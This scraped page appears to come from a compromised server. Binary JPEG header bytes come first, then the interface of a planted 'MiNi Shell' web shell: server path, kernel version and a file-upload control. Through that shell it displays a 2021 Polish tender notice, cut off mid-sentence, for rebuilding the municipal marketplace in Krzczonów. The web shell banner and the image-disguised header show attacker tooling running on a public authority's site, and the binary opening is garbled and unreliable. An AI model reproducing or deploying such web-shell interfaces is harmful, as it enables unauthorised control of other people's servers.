JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210526/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210526/0006557902-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00065579 z dnia 2021-05-26</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa istniejącego targowiska gminnego w Krzczonowie przeznaczonego na promocję lokalnych produktów – III postępowanie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Krzczonów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431019655</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Spokojna 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Krzczonów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">23-110</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">81 566 40 51</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">81 566 40 51</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@krzczonow.mbnet.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">ugkrzczonow.bip.lubelskie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa istniejącego targowiska gminnego w Krzczonowie przeznaczonego na promocję lokalnych produktów – III postępowanie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2527b2ce-bd3f-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00065579</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002515/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 Przebudowa istniejącego targowiska gminnego w Krzczonowie przeznaczonego na promocję lokalnych produktów - III postępowanie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> "Przebudowa istniejącego targowiska gminnego w Krzczonowie przeznaczonego na promocję lokalnych produktów" w ramach EFRROW - PROW 2014-2020, poddziałanie "Wsparcie inwestycji w tworzenie, ulepszanie i rozwijanie podstawowych usług lokalnych dla ludności wiejskiej, w tym rekreacji, kultury i powiązanej infrastruktury" </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ugkrzczonow.bip.lubelskie.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl,<br/>https://epuap.gov.pl/wps/portal, e-mail: sekretariat@krzczonow.mbnet.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">11.1. W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl, ePUAPu,<br/>dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej. 11.2.<br/>Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami: Pana Mariusza Robaka, tel.<br/>(81) 56 64 051, email: mariusz.robak@krzczonow.pl 11.3. Wykonawca zamierzający wziąć udział w<br/>postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca<br/>posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany,<br/>wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”.11.4. Wymagania techniczne i<br/>organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie<br/>korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług<br/>administracji publicznej (ePUAP). Zasady składania ofert oraz dokumentów składanych wraz z ofertą<br/>oraz wymagania techniczne i organizacyjne ich wysyłania opisane zostały w Instrukcji użytkownika.<br/>Wykonawca zobowiązany jest zapoznać się z ww. Instrukcją i postępować wg zasad w niej<br/>wskazanych. Wykonawca ubiegając się o udzielenie zamówienia w szczególności składając ofertę akceptuje zasady korzystania z systemu miniPortal wskazane w Instrukcji użytkownika i SWZ. W celu<br/>korzystania z systemu miniPortal konieczne jest dysponowanie przez użytkownika urządzeniem<br/>teleinformatycznym z dostępem do sieci Internet. Aplikacja działa tylko na platformie Windows i<br/>wymaga .NET Framework 4.5. W przypadku korzystania z urządzeń mobilnych oraz Mac lub Linux,<br/>dostęp do wszystkich funkcjonalności systemu miniPortal może być ograniczony. Specyfikacja<br/>połączenia, formatu przesyłanych danych oraz kodowania i oznaczania czasu odbioru danych:<br/>specyfikacja połączenia formularze udostępnione są za pomocą protokołu TLS 1.2, format danych oraz<br/>kodowanie miniPortal - Formularze dostępne są w formacie HTML z kodowaniem UTF-8, oznaczenia<br/>czasu odbioru danych – miniPortal - wszelkie operacje opierają się o czas serwera i dane zapisywane<br/>są z dokładnością co do setnej części sekundy, integracja z systemem ePUAP jest wykonana w<br/>wykorzystaniem standardowego mechanizmu ePUAP. W przypadku Wykonawcy wysyłającego<br/>wniosek do Zamawiającego, ESP Zamawiającego automatycznie generuje Rodzaj Urzędowego<br/>Poświadczenia Odbioru, czyli Urzędowe Poświadczenie Przedłożenia (UPP), które jest powiązane z<br/>wysyłanym dokumentem. W UPP w sekcji „Dane poświadczenia” jest zawarta informacja o dacie<br/>doręczenia.System dostępny jest za pośrednictwem następujących przeglądarek internetowych:<br/>Microsoft Internet Explorer od wersji 9.0, Mozilla Firefox od wersji 15, Google Chrome od wersji<br/>20.11.5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy:<br/>„Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150<br/>MB. 11.6. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych,<br/>oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się<br/>datę ich przekazania na ePUAP.11.7. Zamawiający przekazuje identyfikator postępowania na<br/>miniPortalu jako załącznik Nr 9 do SWZ. Dane postępowanie można wyszukać również na Liście<br/>wszystkich postępowań w miniPortalu, klikając wcześniej opcję „Dla Wykonawców” lub ze strony<br/>głównej z zakładki Postępowania. Składanie ofert. 11.8. Wykonawca składa ofertę za pośrednictwem<br/>„Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i<br/>udostępnionego również na miniPortalu. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę<br/>jest dostępna dla wykonawców na miniPortalu, w szczegółach danego postępowania. Kontynuacja<br/>znajduje się w sekcji 9.1.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia<br/>ParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L<br/>119 z04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:1) Jest administratorem<br/>danychosobowych Wykonawcy oraz osób, których dane Wykonawca przekazał w niniejszym<br/>postępowaniu;2)dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO<br/>w celuzwiązanym z postępowaniem o udzielenie zamówienia publicznego na zadanie pn.:<br/>„Przebudowaistniejącego targowiska gminnego w Krzczonowie przeznaczonego na promocję<br/>lokalnych produktów. - III postępowanie”prowadzonym w trybie podstawowym;3) odbiorcami danych<br/>osobowych Wykonawcy będą osoby lubpodmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 8 oraz art. 96ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień<br/>publicznych (Dz. U. z 2019 r. poz. 2019 zpóźn. zm.), dalej „ustawa Pzp”;4) dane osobowe Wykonawcy<br/>będą przechowywane, zgodnie z art. 97ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, ajeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwaniaumowy;5) obowiązek podania przez Wykonawcę danych<br/>osobowych bezpośrednio go dotyczących jestwymogiem ustawowym określonym w przepisach ustawy<br/>Pzp, związanym z udziałem w postępowaniuo udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają zustawy Pzp;6) w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane wsposób zautomatyzowany, stosowanie do art. 22<br/>RODO;7) Wykonawca posiada:− na podstawie art.15 RODO prawo dostępu do danych osobowych<br/>dotyczących Wykonawcy;− na podstawie art. 16RODO prawo do sprostowania danych osobowych, o<br/>ile ich zmiana nie skutkuje zmianą wynikupostępowania o udzielenie zamówienia publicznego ani<br/>zmianą postanowień umowy w zakresieniezgodnym z ustawą Pzp oraz nie narusza integralności<br/>protokołu oraz jego załączników;− na podstawie art. 18 RODO prawo żądania od administratora<br/>ograniczenia przetwarzania danychosobowych z zastrzeżeniem przypadków, o których mowa w art. 18<br/>ust. 2 RODO;− prawo downiesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy<br/>Wykonawca uzna, żeprzetwarzanie jego danych osobowych narusza przepisy RODO; Kontynuacja<br/>znajduje się w sekcji 3.16</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Kontynuacja sekcji 3.15:8) Wykonawcy nie przysługuje:− w<br/>związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;− prawo do<br/>przenoszenia danych osobowych, o którym mowa w art. 20 RODO;− na podstawie art. 21 RODO<br/>prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO. W przypadku, gdy wykonanie<br/>obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby<br/>niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub<br/>daty postępowania o udzielenie zamówienia publicznego lub konkursu.Skorzystanie przez osobę,<br/>której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym<br/>mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o<br/>udzielenie zamówienia publicznego lub konkursu ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą.Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia<br/>2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o<br/>udzielenie zamówienia publicznego lub konkursu.W przypadku danych osobowych zamieszczonych<br/>przez Zamawiającego w Biuletynie Zamówień Publicznych, prawa, o których mowa w art. 15 i art. 16<br/>rozporządzenia 2016/679, są wykonywane w drodze żądania skierowanego do Zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RBD.271.4.2021.MR</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p> <p class="mb-0">Zamawiający określił wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie projektów i uzyskanie niezbędnych decyzji, opinii i pozwoleń, w tym decyzji o pozwoleniu na budowę lub zgłoszenia zamiaru wykonania robót budowlanych oraz wykonanie<br/>prac budowlanych dla zadania pn. „Przebudowa istniejącego targowiska gminnego w<br/>Krzczonowie przeznaczonego na promocję lokalnych produktów - III postępowanie.”<br/>Szczegółowy Opis Przedmiotu Zamówienia znajduje się w Rozdziale nr 4 SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45213141-3 - Roboty budowlane w zakresie targowisk zadaszonych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45113000-2 - Roboty na placu budowy</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45232130-2 - Roboty budowlane w zakresie rurociągów do odprowadzania wody burzowej</p> <p class="mb-0">45232440-8 - Roboty budowlane w zakresie budowy rurociągów do odprowadzania ścieków</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45316100-6 - Instalowanie urządzeń oświetlenia zewnętrznego</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">71221000-3 - Usługi architektoniczne w zakresie obiektów budowlanych</p> <p class="mb-0">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</p> <p class="mb-0">71245000-7 - Plany zatwierdzające, rysunki robocze i specyfikacje</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">podano w rozdziale 17 SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji na roboty budowlane oraz zamontowane materiały i urządzenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.1.4. zdolności technicznej lub zawodowej w zakresie:Opis sposobu dokonywania<br/>ocenyspełniania tego warunku:1) Wykonawca winien wykazać, że wykonał należycie nie<br/>wcześniej niżw okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzeniadziałalności jest krótszy - w tym okresie: Co najmniej jedną robotę budowlaną, która<br/>polegała nawykonaniu nawierzchni utwardzonych z kostki brukowej lub płyt betonowych lub z<br/>płyt chodnikowych o powierzchni minimum 500 m2. 2) O udzielenie zamówienia mogą ubiegać<br/>sięWykonawcy, którzy dysponują lub będą dysponować w okresie wykonywania zamówienia<br/>iskierują do jego realizacji:W zakresie projektowania:a) minimum jedną osobą (projektant<br/>wbranży konstrukcyjno-budowlanej) posiadającą uprawnienia do projektowania w<br/>specjalnościkonstrukcyjno – budowlanej, których zakres uprawnia go do projektowania w<br/>zakresie objętymiprzedmiotem zamówienia lub odpowiadające im równoważne uprawnienia<br/>budowlane wydanena podstawie wcześniej obowiązujących przepisów, a w przypadku<br/>Wykonawców zagranicznych– uprawnienia budowlane do projektowania równoważne do wyżej<br/>wskazanych,b) minimumjedną osobą (projektant w branży architektonicznej) posiadającą<br/>uprawnienia do projektowaniaw specjalności architektonicznej, których zakres uprawnia go do<br/>projektowania w zakresieobjętymi przedmiotem zamówienia lub odpowiadające im równoważne<br/>uprawnienia budowlanewydane na podstawie wcześniej obowiązujących przepisów, a w<br/>przypadku Wykonawcówzagranicznych – uprawnienia budowlane do projektowania równoważne<br/>do wyżej wskazanych,c)minimum jedną osobą (projektant w branży drogowej) posiadającą<br/>uprawnienia doprojektowania w specjalności inżynieryjnej drogowej, których zakres uprawnia go<br/>doprojektowania w zakresie objętymi przedmiotem zamówienia lub odpowiadające im<br/>równoważneuprawnienia budowlane wydane na podstawie wcześniej obowiązujących<br/>przepisów, a wprzypadku Wykonawców zagranicznych – uprawnienia budowlane do<br/>projektowaniarównoważne do wyżej wskazanych,d) minimum jedną osobą (projektant w branży<br/>sanitarnej)posiadającą uprawnienia do projektowania w specjalności instalacyjnej w zakresie<br/>instalacji iurządzeń wodociągowych i kanalizacyjnych których zakres uprawnia go do<br/>projektowania wzakresie objętymi przedmiotem zamówienia lub odpowiadające im równoważne<br/>uprawnieniabudowlane wydane na podstawie wcześniej obowiązujących przepisów, a w<br/>przypadkuWykonawców zagranicznych – uprawnienia budowlane do projektowania równoważne<br/>do wyżejwskazanych,e) minimum jedną osobą (projektant w branży elektrycznej)<br/>posiadającąodpowiednie uprawnienia do projektowania w specjalności instalacyjnej w zakresie<br/>instalacji iurządzeń elektrycznych i elektroenergetycznych których zakres uprawnia go do<br/>projektowania wzakresie objętymi przedmiotem zamówienia lub odpowiadające im równoważne<br/>uprawnieniabudowlane wydane na podstawie wcześniej obowiązujących przepisów, a w<br/>przypadkuWykonawców zagranicznych – uprawnienia budowlane do projektowania równoważne<br/>do wyżejwskazanych,W zakresie wykonywania robót:f) min. jedną osobą posiadającą<br/>odpowiednieuprawnienia budowlane do kierowania robotami budowlanymi w specjalności<br/>konstrukcyjno –budowlanej jednocześnie pełniącą funkcję kierownika budowy, których zakres uprawnia go dokierowania robotami objętymi przedmiotem zamówienia lub odpowiadające im<br/>równoważneuprawnienia budowlane wydane na podstawie wcześniej obowiązujących<br/>przepisów, a wprzypadku Wykonawców zagranicznych – uprawnienia budowlane do kierowania<br/>robotamirównoważne do wyżej wskazanych,g) min. jedną osobą posiadającą odpowiednie<br/>uprawnieniabudowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej<br/>drogowej, którychzakres uprawnia go do kierowania robotami objętymi przedmiotem zamówienia<br/>lubodpowiadające im równoważne uprawnienia budowlane wydane na podstawie<br/>wcześniejobowiązujących przepisów, a w przypadku Wykonawców zagranicznych –<br/>uprawnieniabudowlane do kierowania robotami równoważne do wyżej wskazanych,h) min. jedną<br/>osobąposiadającą odpowiednie uprawnienia budowlane do kierowania robotami budowlanymi<br/>wspecjalności instalacyjnej w zakresie instalacji i urządzeń wodociągowych i<br/>kanalizacyjnych,których zakres uprawnia go do kierowania robotami objętymi 